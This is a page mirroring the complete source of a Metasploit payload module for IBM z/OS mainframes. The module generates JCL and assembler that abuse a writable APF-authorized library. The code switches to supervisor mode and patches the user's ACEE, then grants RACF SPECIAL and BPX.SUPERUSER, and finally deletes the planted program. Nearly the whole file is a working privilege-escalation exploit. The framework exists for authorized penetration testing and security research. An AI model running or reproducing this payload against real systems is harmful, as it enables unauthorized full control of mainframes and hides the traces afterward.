Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb
21551 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
##

7
# This is a JCL command payload for z/OS - mainframe.

8
#   It will escalate privileges of an account on the system if the user

9
#   can identify a writable APF authorised library "APFLIB"

10
#

11
#   See https://www.ibm.com/support/knowledgecenter/zosbasics/com.ibm.zos.zsecurity/zsecc_060.htm

12
#   for more information on APF Authorized Libraries

13
#

14
#   Thank you to Ayoub & The Brummie for the assembler ideas.

15
#

16
#   To-do (BeS 4/11/17)

17
#     Add options for privileges that can be added.

18
#     Auto scan for writable APF authorized library.

19
##

20


21
module MetasploitModule

22
  CachedSize = 3156

23
  include Msf::Payload::Single

24
  include Msf::Payload::Mainframe

25


26
  def initialize(info = {})

27
    super(

28
      merge_info(

29
        info,

30
        'Name' => 'JCL to Escalate Privileges',

31
        'Description' => %q{

32
          Elevate privileges for user. Adds

33
          SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using

34
          an unsecured/updateable APF authorized library (APFLIB) and updating

35
          the user's ACEE using this program/library.  Note: This privesc only

36
          works with z/OS systems using RACF, no other ESM is supported.

37
        },

38
        'Author' => [

39
          'Bigendian Smalls',

40
          'Ayoub'

41
        ],

42
        'License' => MSF_LICENSE,

43
        'Platform' => 'mainframe',

44
        'Arch' => ARCH_CMD,

45
        'Handler' => Msf::Handler::None,

46
        'Session' => Msf::Sessions::MainframeShell,

47
        'PayloadType' => 'cmd',

48
        'RequiredCmd' => 'jcl',

49
        'Payload' => {

50
          'Offsets' => {},

51
          'Payload' => ''

52
        }

53
      )

54
    )

55
    register_options(

56
      [

57
        Opt::RPORT(21),

58
        OptString.new('ACTNUM', [true, 'Accounting info for JCL JOB card', 'MSFUSER-ACCTING-INFO']),

59
        OptString.new('PGMNAME', [true, 'Programmer name for JCL JOB card', 'programmer name']),

60
        OptString.new('JCLASS', [true, 'Job Class for JCL JOB card', 'A']),

61
        OptString.new('NOTIFY', [false, 'Notify User for JCL JOB card', '']),

62
        OptString.new('MSGCLASS', [true, 'Message Class for JCL JOB card', 'Z']),

63
        OptString.new('MSGLEVEL', [true, 'Message Level for JCL JOB card', '(0,0)']),

64
        OptString.new('APFLIB', [true, 'APF Authorized Library to use', 'SYS1.LINKLIB'])

65
      ],

66
      self.class

67
    )

68
    register_advanced_options(

69
      [

70
        OptBool.new('NTFYUSR', [true, 'Include NOTIFY Parm?', false]),

71
        OptString.new('JOBNAME', [true, 'Job name for JCL JOB card', 'DUMMY'])

72
      ],

73
      self.class

74
    )

75
  end

76


77
  ##

78
  # Construct Payload

79
  ##

80
  def generate(_opts = {})

81
    super + command_string

82
  end

83


84
  ##

85
  # Setup replacement vars from options if need be

86
  ##

87
  def command_string

88
    jcl_jobcard +

89
      "//S1        EXEC ASMACLG,PARM.L='AC(1)'\n" \

90
      "//C.SYSLIB  DD DSN=SYS1.SISTMAC1,DISP=SHR\n" \

91
      "//          DD DSN=SYS1.MACLIB,DISP=SHR\n" \

92
      "//L.SYSLMOD DD DISP=SHR,DSN=#{datastore['APFLIB']}(APFPRIV)\n" \

93
      "//C.SYSIN   DD *,DLM=ZZ\n" \

94
      "         TITLE  'APF MISCONFIG PRIVESC FOR MSF'\n" \

95
      "APFPRIV  CSECT\n" \

96
      "***********************************************************************\n" \

97
      "*         SETUP registers and save areas                              *\n" \

98
      "***********************************************************************\n" \

99
      "MAIN     STM   14,12,12(13)    # Save caller reg\n" \

100
      "         LR    8,15            # Base register\n" \

101
      "         USING MAIN,8          # R8 for addressability\n" \

102
      "         GETMAIN RU,LV=72      # for our savearea\n" \

103
      "         ST    13,4(,1)        # Store Caller's SA address\n" \

104
      "         ST    1,8(,13)        # Put my SA addr in caller's SA\n" \

105
      "         LR    13,1            # R13 has addr of our SA\n" \

106
      "         DS    0H              # halfword boundaries\n" \

107
      "***********************************************************************\n" \

108
      "* MAIN PROGRAM STMTS HERE                                             *\n" \

109
      "***********************************************************************\n" \

110
      "         BAL   6,AUTHUSR       # branch authuser routine\n" \

111
      "         B     EXITP           # exit time\n" \

112
      "***********************************************************************\n" \

113
      "* AUTHUSER ROUTINE                                                    *\n" \

114
      "***********************************************************************\n" \

115
      "AUTHUSR  MODESET KEY=ZERO,MODE=SUP  # let's get into supervisor mode!\n" \

116
      "         L     11,X'224'       # R11 points to ASCB\n" \

117
      "         L     11,X'6C'(11)    # R11 points to ASXB\n" \

118
      "         L     11,X'C8'(11)    # R11 points to ACEE\n" \

119
      "         NI    X'26'(11),X'00' # Clear Byte x'26'\n" \

120
      "         OI    X'26'(11),X'B1' # Add Oper & Special to userproc\n" \

121
      "         NI    X'27'(11),X'00' # Clear Byte x'27\n" \

122
      "         OI    X'27'(11),X'80' # ALTER access to all resource\n" \

123
      "         MODESET KEY=NZERO,MODE=PROB # back to normal\n" \

124
      "         XR    15,15           # set rc=0 regardless\n" \

125
      "         BR    6               # R6 has return reg\n" \

126
      "***********************************************************************\n" \

127
      "*        Cleanup and exit - R15 has exit code                         *\n" \

128
      "***********************************************************************\n" \

129
      "EXITP    LR    1,13            # Move my SA into R1\n" \

130
      "         LR    2,15            # SAVE RC\n" \

131
      "         L     13,4(,13)       # RST Caller SA Addr\n" \

132
      "         L     14,12(13)       # Reload R14\n" \

133
      "         FREEMAIN RU,A=(1),LV=72\n" \

134
      "         LR    15,2            # RESTORE RC\n" \

135
      "         LM    0,12,20(13)     # Reload all but 14/15\n" \

136
      "         BCR   15,14           # Branch back to caller\n" \

137
      "         END   APFPRIV            # end pgm\n" \

138
      "ZZ\n" \

139
      "//S2        EXEC PGM=IKJEFT01\n" \

140
      "//SYSTSIN   DD *\n" \

141
      " ALU #{datastore['FTPUSER']} SPECIAL\n" \

142
      " PE BPX.SUPERUSER CLASS(FACILITY) ID(#{datastore['FTPUSER']}) ACCESS(READ)\n" \

143
      " SETR RACL(FACILITY) REF\n" \

144
      "/*\n" \

145
      "//SYSIN     DD DUMMY\n" \

146
      "//SYSTSPRT  DD SYSOUT=*\n" \

147
      "//S3        EXEC PGM=IDCAMS\n" \

148
      "//SYSPRINT  DD SYSOUT=*\n" \

149
      "//TEMPDD    DD DSN=#{datastore['APFLIB']},DISP=SHR\n" \

150
      "//SYSIN     DD *\n" \

151
      " DELETE #{datastore['APFLIB']}(APFPRIV) FILE(TEMPDD)\n" \

152
      "/*\n" \

153
  end

154
end

155


156